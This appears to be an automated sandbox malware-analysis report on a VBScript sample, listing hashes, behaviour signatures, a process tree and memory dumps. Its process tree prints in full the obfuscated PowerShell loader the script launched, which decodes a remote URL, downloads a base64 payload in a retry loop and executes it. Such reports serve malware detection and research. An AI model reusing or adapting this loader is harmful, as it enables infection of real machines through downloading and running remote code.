Analysis

  • max time kernel
    206s
  • max time network
    207s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 21:21

General

  • Target

    B3CBE99653473F02E9059A76D009E0E0E88763C8CB2A8E4DDF21B189761BD6F5.vbs

  • Size

    29KB

  • MD5

    34bdef2ccee6d2e4c44bdde97100ee72

  • SHA1

    c57af676764256de944346904ff895f1b6a6b649

  • SHA256

    b3cbe99653473f02e9059a76d009e0e0e88763c8cb2a8e4ddf21b189761bd6f5

  • SHA512

    8c0bb687c5566051dccf596e4532ad2da09729d7c7de603037bbcd97235dd7dc2d7ac3f526660640cae06d2f5772dc69d8bc8163d2516f07152f58a19bc3d05f

  • SSDEEP

    384:XrCiPWsGHGX54OfdYFFYF2Iq4cS5Jw7lOBn:XeYAGp4S5Jw7lOBn

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\B3CBE99653473F02E9059A76D009E0E0E88763C8CB2A8E4DDF21B189761BD6F5.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Windows\System32\ping.exe
      ping gormezl_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:2912
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2296

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabCE39.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • memory/2296-20-0x000007FEF682E000-0x000007FEF682F000-memory.dmp

    Filesize

    4KB

  • memory/2296-21-0x000000001B640000-0x000000001B922000-memory.dmp

    Filesize

    2.9MB

  • memory/2296-22-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

    Filesize

    32KB

  • memory/2296-23-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-24-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-25-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-26-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-27-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-28-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-29-0x000007FEF682E000-0x000007FEF682F000-memory.dmp

    Filesize

    4KB

  • memory/2296-30-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB